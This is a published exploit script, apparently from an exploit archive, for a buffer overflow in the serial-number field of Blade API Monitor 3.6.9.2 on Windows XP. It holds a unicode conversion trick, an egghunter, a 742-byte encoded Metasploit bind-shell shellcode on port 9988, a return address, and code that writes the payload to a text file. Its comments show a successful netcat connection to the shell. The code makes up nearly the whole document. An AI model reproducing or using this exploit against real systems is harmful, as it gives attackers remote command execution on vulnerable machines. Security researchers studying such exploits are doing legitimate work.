Blade API Monitor Unicode Bypass Buffer Overflow (serial-number field, local bind-shell PoC)
Posted on 21 February 2012
#!/usr/bin/python -w #---------------------------------------------------------------------------------# # Exploit: Blade API Monitor Unicode Bypass (Serial Number BOF) # # Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com # # http://www.fuzzysecurity.com/exploits/8.html # # OS: WinXP PRO SP3 # # Software: http://www.exploit-db.com/wp-content/themes/exploit/applications/ # # f248239d09b37400e8269cb1347c240e-BladeAPIMonitor-3.6.9.2.Setup.exe # # # # Unicode Exploit by FullMetalFouad - http://www.exploit-db.com/exploits/18349/ # #---------------------------------------------------------------------------------# # This is a super strange exploit. First I would like to commend "FullMetalFouad" # # for the unicode work on the original exploit. Originally I wanted to see if I # # could simplify the process. While I was doing that I lost sight of the fact # # that the instructions had to be printable since we need to copy them from a # # text file. When I opened my POC I saw that all the characters had been # # converted to weird blocks (check my site for a screenshot). On a whim I tried # # to paste these characters in the serial number field and amazingly the buffer # # in the debugger was intact but with one important difference, the unicode had # # been converted back to regular ASCII!! Very strange but super fortunate!! If # # you want to experiment with the exploit just keep in mind to (1) open it in # # windows notepad and (2) that all the characters need to be converted to those # # blocks for it to work (depending on your buffer this isn't always the case). # #---------------------------------------------------------------------------------# # root@bt:~# nc -nv 192.168.111.128 9988 # # (UNKNOWN) [192.168.111.128] 9988 (?) open # # Microsoft Windows XP [Version 5.1.2600] # # (C) Copyright 1985-2001 Microsoft Corp. 
# # # # C:Program FilesBladeAPIMonitor>ipconfig # # ipconfig # # # # Windows IP Configuration # # # # # # Ethernet adapter Local Area Connection: # # # # Connection-specific DNS Suffix . : localdomain # # IP Address. . . . . . . . . . . . : 192.168.111.128 # # Subnet Mask . . . . . . . . . . . : 255.255.255.0 # # Default Gateway . . . . . . . . . : # # # # C:Program FilesBladeAPIMonitor> # #---------------------------------------------------------------------------------# filename="PasteMe.txt" #---------------------------------------------------------------------------------# # Originally unicode instructions to put an address in EAX, here it is used to # # trigger notepad bug and get UNICODE => ASCII conversion... # #---------------------------------------------------------------------------------# UniKill = ( "xB8x06xAAx6Fx50" "x6Fx4Cx6Fx58x6F" "x05x73x00x6FxB0" "xB9xD8xAAx6FxE8") #Egghunter - Marker b33f #Size 32-bytes hunter = ( "x66x81xcaxff" "x0fx42x52x6a" "x02x58xcdx2e" "x3cx05x5ax74" "xefxb8x62x33" #b3 "x33x66x8bxfa" #3f "xafx75xeaxaf" "x75xe7xffxe7") #msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c #Size 742-bytes shellcode = ( "xd9xe1xd9x74x24xf4x59x49x49x49x49x49x49x49x49" "x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41x58" "x50x30x41x30x41x6bx41x41x51x32x41x42x32x42x42" "x30x42x42x41x42x58x50x38x41x42x75x4ax49x4bx4c" "x48x68x4bx39x37x70x45x50x53x30x71x70x4fx79x69" "x75x34x71x79x42x53x54x4cx4bx71x42x64x70x6cx4b" "x42x72x66x6cx6cx4bx73x62x57x64x4ex6bx73x42x36" "x48x36x6fx4fx47x71x5ax44x66x56x51x49x6fx75x61" "x69x50x4cx6cx45x6cx61x71x61x6cx63x32x44x6cx47" "x50x49x51x6ax6fx56x6dx55x51x49x57x4bx52x58x70" "x62x72x76x37x4ex6bx56x32x34x50x6cx4bx47x32x37" "x4cx73x31x5ax70x6cx4bx61x50x62x58x4dx55x49x50" "x63x44x50x4ax36x61x5ax70x50x50x6ex6bx33x78x74" "x58x4cx4bx63x68x57x50x45x51x4ax73x38x63x67x4c" "x42x69x4ex6bx56x54x6cx4bx47x71x7ax76x35x61x59" "x6fx56x51x49x50x6ex4cx6bx71x4ax6fx46x6dx67x71" 
"x48x47x46x58x59x70x62x55x4ax54x56x63x43x4dx79" "x68x75x6bx73x4dx46x44x63x45x4bx52x61x48x6ex6b" "x70x58x46x44x65x51x4bx63x32x46x4cx4bx44x4cx50" "x4bx4cx4bx46x38x77x6cx65x51x6bx63x4cx4bx76x64" "x6ex6bx56x61x38x50x6ex69x32x64x76x44x44x64x71" "x4bx71x4bx75x31x73x69x72x7ax72x71x59x6fx59x70" "x76x38x63x6fx51x4ax4cx4bx74x52x78x6bx4ex66x71" "x4dx51x78x67x43x46x52x37x70x43x30x31x78x71x67" "x51x63x35x62x71x4fx76x34x42x48x50x4cx53x47x31" "x36x54x47x69x6fx49x45x68x38x4ex70x37x71x67x70" "x35x50x37x59x7ax64x52x74x50x50x63x58x51x39x4b" "x30x30x6bx75x50x39x6fx69x45x32x70x76x30x42x70" "x66x30x73x70x62x70x31x50x42x70x43x58x49x7ax64" "x4fx4bx6fx39x70x59x6fx5ax75x6bx39x78x47x30x31" "x49x4bx62x73x33x58x74x42x43x30x65x77x53x34x4c" "x49x4ax46x70x6ax44x50x46x36x56x37x63x58x79x52" "x39x4bx34x77x55x37x6bx4fx38x55x62x73x76x37x53" "x58x6fx47x4bx59x37x48x6bx4fx69x6fx58x55x72x73" "x30x53x53x67x50x68x54x34x78x6cx65x6bx6bx51x39" "x6fx6ex35x61x47x6cx49x78x47x73x58x31x65x70x6e" "x30x4dx45x31x79x6fx49x45x43x58x50x63x70x6dx43" "x54x67x70x4dx59x39x73x76x37x53x67x32x77x56x51" "x69x66x30x6ax52x32x36x39x33x66x6ax42x6bx4dx62" "x46x6bx77x30x44x34x64x35x6cx43x31x67x71x4cx4d" "x50x44x74x64x32x30x6fx36x75x50x53x74x70x54x32" "x70x70x56x56x36x76x36x62x66x76x36x72x6ex36x36" "x52x76x71x43x30x56x73x58x64x39x7ax6cx35x6fx6c" "x46x59x6fx6ex35x6bx39x59x70x70x4ex51x46x47x36" "x39x6fx34x70x55x38x44x48x6cx47x37x6dx33x50x49" "x6fx4ax75x6dx6bx5ax50x6fx45x79x32x72x76x55x38" "x4fx56x4dx45x4fx4dx4fx6dx6bx4fx69x45x47x4cx67" "x76x43x4cx55x5ax6dx50x79x6bx4dx30x51x65x33x35" "x4fx4bx62x67x37x63x31x62x62x4fx53x5ax37x70x76" "x33x49x6fx4bx65x41x41") #---------------------------------------------------------------------------------# # (*) Due to the wierd conversion i couldn't do proper badchar analysis # # (1) 0x00425e04 : push esp # ret | startnull,ascii ==> BladeAPIMonitor.exe # # (2) egghunter: We do this because we need more space than we have at ESP # # (3) alpha mixed Bindshell port 9988 # 
#---------------------------------------------------------------------------------# egg = "x90"*18 + hunter evil = "x90"*10 + "b33f"*2 + shellcode buffer = UniKill + "A"*560 + "x04x5Ex42x00" + egg + "B"*500 + evil textfile = open(filename , 'w') textfile.write(buffer) textfile.close()
